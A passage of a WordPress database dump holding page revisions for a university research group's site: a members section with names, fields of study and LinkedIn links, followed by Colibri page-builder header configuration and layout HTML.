11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c195-outer\">\n            <div data-colibri-id=\"182-c195\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c195 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c196\" class=\"d-block style-913 style-local-182-c196 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-ruby_parcells-scaled-1-2-e1697209095569.jpg\" class=\"wp-image-1792 style-913-image style-local-182-c196-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c196-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c197\" class=\"h-global-transition-all h-heading style-914 style-local-182-c197 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c197\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ruby Parcells</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c198\" class=\"h-text h-text-component style-915 style-local-182-c198 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c199-outer\">\n            <div data-colibri-id=\"182-c199\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c199 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c200\" class=\"d-block style-913 style-local-182-c200 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Reshmanjali-1-e1697209179440.jpeg\" class=\"wp-image-1794 style-913-image style-local-182-c200-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c200-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c201\" class=\"h-global-transition-all h-heading style-914 style-local-182-c201 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c201\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sai Reshmanjali</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c202\" class=\"h-text h-text-component style-915 style-local-182-c202 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c203\" class=\"style-917 style-local-182-c203 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/reshmanjali-guntupalli/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c212-outer\">\n            <div data-colibri-id=\"182-c212\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c212 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c213\" class=\"d-block style-913 style-local-182-c213 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-cropped-Eliza-Schuh-e1697208271242.jpg\" class=\"wp-image-1795 style-913-image style-local-182-c213-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c213-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c214\" class=\"h-global-transition-all h-heading style-914 style-local-182-c214 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c214\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Eliza Schuh</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c215\" class=\"h-text h-text-component style-915 style-local-182-c215 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c216\" class=\"style-917 style-local-182-c216 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/search/results/all/?fetchDeterministicClustersOnly=true&amp;heroEntityKey=urn%3Ali%3Afsd_profile%3AACoAACVdt3kBua3o83BdyteC4Ssk8shnCAvZZZc&amp;keywords=eliza%20schuh&amp;origin=RICH_QUERY_TYPEAHEAD_HISTORY&amp;position=0&amp;searchId=e7657352-5ea3-4501-b984-d21542771bc4&amp;sid=WW)&amp;spellCorrectionEnabled=true\"\n                        h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c204-outer\">\n            <div data-colibri-id=\"182-c204\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c204 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c205\" class=\"d-block style-913 style-local-182-c205 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Bronson-e1697209357897.png\" class=\"wp-image-1797 style-913-image style-local-182-c205-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c205-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c206\" class=\"h-global-transition-all h-heading style-914 style-local-182-c206 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c206\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bronson Tharpe</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c207\" class=\"h-text h-text-component style-915 style-local-182-c207 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c208\" class=\"style-917 style-local-182-c208 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bronson-tharpe-9b754a1ba/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Members','','inherit','closed','closed','','182-revision-v1','','','2023-10-13 11:04:29','2023-10-13 15:04:29','',182,'https://gsudice.dataconn.net/?p=1806',0,'revision','',0),(1807,1,'2023-10-13 11:04:29','2023-10-13 15:04:29','{\"name\":\"hop-header\",\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"anchor\":false,\"backup\":{\"overlap\":{\"menu\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"navigation\":{\"background\":{\"color\":\"transparent\"}}}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h5\",\"parentId\":\"25-h4\",\"partialId\":25,\"styleRef\":38,\"type\":\"header\"}],\"id\":\"25-h4\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":37,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"children\":[{\"name\":\"hop-spacer\",\"slot\":null,\"parentId\":\"25-h6\",\"index\":0,\"id\":\"25-h7\",\"partialId\":25,\"styleRef\":40,\"type\":\"header\"}],\"id\":\"25-h6\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":39,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"86.16\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h15\",\"parentId\":\"25-h14\",\"partialId\":25,\"styleRef\":47,\"type\":\"header\"}],\"id\":\"25-h14\",\"parentId\":\"25-h13\",\"partialId\":25,\"styleRef\":46,\"type\":\"header\"}],\"id\":\"25-h13\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":45,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"id\":\"25-h17\",\"parentId\":\"25-h16\",\"partialId\":25,\"styleRef\":49,\"type\":\"header\"}],\"id\":\"25-h16\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":48,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"25-h12\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":50,\"type\":\"header\"}],\"id\":\"25-h11\",\"parentId\":\"25-h10\",\"partialId\":25,\"styleRef\":44,\"type\":\"header\"}],\"id\":\"25-h10\",\"parentId\":\"25-h9\",\"partialId\":25,\"styleRef\":43,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\",\"priority\":1}},\"parentId\":\"25-h8\",\"index\":1,\"id\":\"25-h9\",\"partialId\":25,\"styleRef\":42,\"type\":\"header\"}],\"id\":\"25-h8\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":41,\"type\":\"header\"}],\"id\":\"25-h3\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":36,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"id\":\"25-h2\",\"partialId\":25,\"styleRef\":35,\"type\":\"header\",\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/twitter.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":54,\"slot\":null,\"parentId\":\"25-h20\",\"index\":0,\"id\":\"25-h21\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h20\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":53,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":56,\"slot\":null,\"parentId\":\"25-h22\",\"index\":0,\"id\":\"25-h23\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h22\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":55,\"type\":\"header\"}],\"id\":\"25-h19\",\"parentId\":\"25-h18\",\"partialId\":25,\"styleRef\":52,\"type\":\"header\"}],\"id\":\"25-h18\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":51,\"type\":\"header\"}]}},{\"name\":\"hop-hero\",\"props\":{\"anchor\":false,\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-page-title\",\"id\":\"25-h27\",\"parentId\":\"25-h26\",\"partialId\":25,\"styleRef\":60,\"type\":\"header\"}],\"id\":\"25-h26\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":59,\"type\":\"header\"},{\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"25-h28\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":278,\"type\":\"header\"}],\"parentId\":\"25-h24\",\"index\":0,\"id\":\"25-h25\",\"partialId\":25,\"styleRef\":58,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"type\":\"header\",\"id\":\"25-h24\",\"partialId\":25,\"styleRef\":57}],\"id\":\"25-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":25,\"styleRef\":34}','','','inherit','closed','closed','','26-revision-v1','','','2023-10-13 11:04:29','2023-10-13 15:04:29','',26,'https://gsudice.dataconn.net/?p=1807',0,'revision','',0),(1808,1,'2023-10-13 11:04:29','2023-10-13 15:04:29','<div data-colibri-id=\"25-h1\" class=\"page-header style-34 style-local-25-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"true\" role=\"banner\" class=\"h-navigation_outer h-navigation_overlap style-35-outer style-local-25-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"25-h2\" class=\"h-section h-navigation h-navigation d-flex style-35 style-local-25-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"25-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-36 style-local-25-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-37-outer style-local-25-h4-outer\">\n                <div data-colibri-id=\"25-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-37 style-local-25-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h5\" class=\"d-flex align-items-center text-lg-left text-md-left text-left justify-content-lg-start justify-content-md-start justify-content-start style-38 style-local-25-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-38-text 